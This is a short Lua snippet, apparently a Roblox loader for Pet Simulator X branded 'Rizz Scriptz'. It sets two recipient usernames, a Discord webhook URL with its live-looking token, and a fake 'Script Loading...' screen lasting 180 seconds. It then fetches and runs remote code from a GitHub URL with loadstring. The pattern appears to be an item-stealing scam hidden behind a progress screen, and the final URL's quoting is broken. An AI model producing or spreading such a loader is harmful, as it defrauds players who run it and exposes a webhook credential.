lua

UserName = "pe_4u"

UserName2 = "KABAYO1205"

Webhook = "https://discord.com/api/webhooks/1102172435329064960/8EXRPq5REYPETPASG_4JJsM3tvKDfLbop6A8OckxptifqA-L79CKeL-QkxoslYH4Yuyb"

_G.LoadingScreen = true

_G.AntiLeave = false

_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"

_G.FirstText = "Script Preparing"

_G.SecondText = "Script Loading..."

_G.ThirdText = "Almost Done..."

_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/PSXscript23/PSX-script/main/PSX!script))();
